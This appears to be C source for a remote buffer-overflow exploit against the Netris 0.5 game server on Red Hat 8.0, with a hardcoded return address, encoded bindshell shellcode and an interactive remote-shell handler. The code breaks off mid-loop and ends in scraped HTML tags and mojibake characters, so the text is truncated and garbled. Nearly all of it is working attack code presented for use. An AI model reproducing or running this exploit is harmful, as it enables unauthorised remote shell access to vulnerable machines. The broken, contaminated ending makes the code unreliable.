/* 01010101010101010101010101010101010101010101010101010101010101010101010101 0 >>Netris v 0.5 Remote exploit for Red Hat 8.0 1 0 by 1 0 >>Shashank Pandey a.k.a <<=SupaHer0=>> 1 0 (reach_shash [at] linuxmail.org) 1 0 -> Greetz to ma bros : Hi_Tech_Assain , Rafa(leave NASA alone ;-) 1 0 0 -> lol@ that e-security fair in Delhi...... what a joke ! 1 0 -> Love to tha babes in Delhi... j00 r getting bettah and bettah 1 each passing day.... ;-) 0 0 1 0101010101010101010101010101010101010101010101010101010101010101010101010 */ #include #include #include #include #include #include #include #define MYBUF 10000 #define RETADDR (0x08050c00+70) // Red Hat 8.0 #define MYPORT 9284 /* Hie Teso ;-) */ void shell (int sock) { int l; char buf[512]; fd_set rfds; char *cmd="/bin/uname -a;id\n"; send(sock,cmd,strlen(cmd),0); while (1) { FD_SET (0, &rfds); FD_SET (sock, &rfds); select (sock + 1, &rfds, NULL, NULL, NULL); if (FD_ISSET (0, &rfds)) { l = read (0, buf, sizeof (buf)); if (l <= 0) { printf("\n - Connection closed by local user\n"); exit (EXIT_FAILURE); } write (sock, buf, l); } if (FD_ISSET (sock, &rfds)) { l = read (sock, buf, sizeof (buf)); if (l == 0) { printf ("\n - Connection closed by remote host.\n"); exit (EXIT_FAILURE); } else if (l < 0) { printf ("\n - Read failure\n"); exit (EXIT_FAILURE); } write (1,buf, l); } } } static char hellcode[]= /* bindshell(45295)by netric ; wait for mine.. */ "\x57\x5f\xeb\x11\x5e\x31\xc9\xb1\xc8\x80\x44\x0e\xff\x2b\x49\x41\x49\x75" "\xf6\xeb\x05\xe8\xea\xff\xff\xff\x06\x95\x06\xb0\x06\x9e\x26\x86\xdb\x26" "\x86\xd6\x26\x86\xd7\x26\x5e\xb6\x88\xd6\x85\x3b\xa2\x55\x5e\x96\x06\x95" "\x06\xb0\x25\x25\x25\x3b\x3d\x85\xc4\x88\xd7\x3b\x28\x5e\xb7\x88\xe5\x28" "\x88\xd7\x27\x26\x5e\x9f\x5e\xb6\x85\x3b\xa2\x55\x06\xb0\x0e\x98\x49\xda" "\x06\x95\x15\xa2\x55\x06\x95\x25\x27\x5e\xb6\x88\xd9\x85\x3b\xa2\x55\x5e" "\xac\x06\x95\x06\xb0\x06\x9e\x88\xe6\x86\xd6\x85\x05\xa2\x55\x06\x95\x06" "\xb0\x25\x25\x2c\x5e\xb6\x88\xda\x85\x3b\xa2\x55\x5e\x9b\x06\x95\x06\xb0" "\x85\xd7\xa2\x55\x0e\x98\x4a\x15\x06\x95\x5e\xd0\x85\xdb\xa2\x55\x06\x95" "\x06\x9e\x5e\xc8\x85\x14\xa2\x55\x06\x95\x16\x85\x14\xa2\x55\x06\x95\x16" "\x85\x14\xa2\x55\x06\x95\x25\x3d\x04\x04\x48\x3d\x3d\x04\x37\x3e\x43\x5e" "\xb8\x60\x29\xf9\xdd\x25\x28\x5e\xb6\x85\xe0\xa2\x55\x06\x95\x15\xa2\x55" "\x06\x95\x5e\xc8\x85\xdb\xa2\x55\xc0\x6e"; //who wants to know..who wants to know.. bad men.. int main(int argc , char **argv) { struct sockaddr_in rem_addr; struct hostent *h; int i,fd,newfd,sock; char buffer[MYBUF]; printf("\n================================\n"); printf("\nNetris 0.5 buffer overflow sploit\n"); printf("by Shashank a.k.a <<=SupaHer0=>>\n"); //printf("Usage : %s \n\n" , argv[1]); printf("\n================================\n"); if(argc<2) {printf("Usage: %s \n\n" ,argv[0]); exit(0);} h=gethostbyname(argv[1]); if(h=NULL) {printf("%s : unknown host %s" , argv[1] ); exit(1);} rem_addr.sin_family=AF_INET; rem_addr.sin_addr.s_addr=inet_addr(argv[1]); rem_addr.sin_port=htons(MYPORT); for(i=0;i
<span id="7ztzv"></span>
<sub id="7ztzv"></sub>

<span id="7ztzv"></span><form id="7ztzv"></form>

<span id="7ztzv"></span>

        <address id="7ztzv"></address>

            ÑÇÖÞÅ·ÃÀÔÚÏß